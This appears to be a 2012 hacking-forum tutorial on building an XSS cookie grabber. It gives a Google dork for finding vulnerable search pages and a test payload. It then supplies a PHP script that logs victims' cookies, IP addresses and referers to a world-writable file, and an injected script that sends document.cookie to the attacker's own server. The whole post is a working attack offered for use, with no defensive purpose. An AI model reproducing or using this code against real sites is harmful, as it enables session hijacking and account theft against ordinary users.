So first we need to find an exploitable site. This one can be used.:
google dork: inurl:".com/search.php?keyword="
why inurl:".com ??? , thats because else we get different websites what is not ur language like japanese. we can change keyword to something else like ?results= , word=,
etc etc
Type this in the search box:
'><script>alert('XSS - UPGOINGSTAR')</script>
' can also be "
if its right, a popup will appear with the message; XSS - UPGOINGSTAR.
Jay, we got a big change to exploit it! Hehe
Lets create THE cookie grabber.
Open notepad and copy/paste this:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location:
http://www.site.com/")?>
save it as cookie.php , and create a .txt file named file.txt , and chmod file.txt to 777.
what does this code do.
1. It steals the cookie ofcurz
2. It writes the cookie to file.txt , we can change that if u want
3. It also writes the ip of the victim, and the date when its happend.
4. When its done, the user will be redirected to site.com
Lets test;
http://www.site.com/search.phpinput field:
'><script>document.location.replace('http://www.weRSITE.com/cookie.php?c='+document.cookie);</script>
if its done, then u see the google page at the front of u, and check the file.txt on wer server ..
And also u can try:
http://www.site.com/search.php?keywords='><script>document.location.re place('http://www.weRSITE.com/cookie.php?c='+document.cookie);</script>
sometimes that way will work, sometimes it wont.
Subject: making a working cookie grabber 
Fri Feb 03, 2012 2:15 am
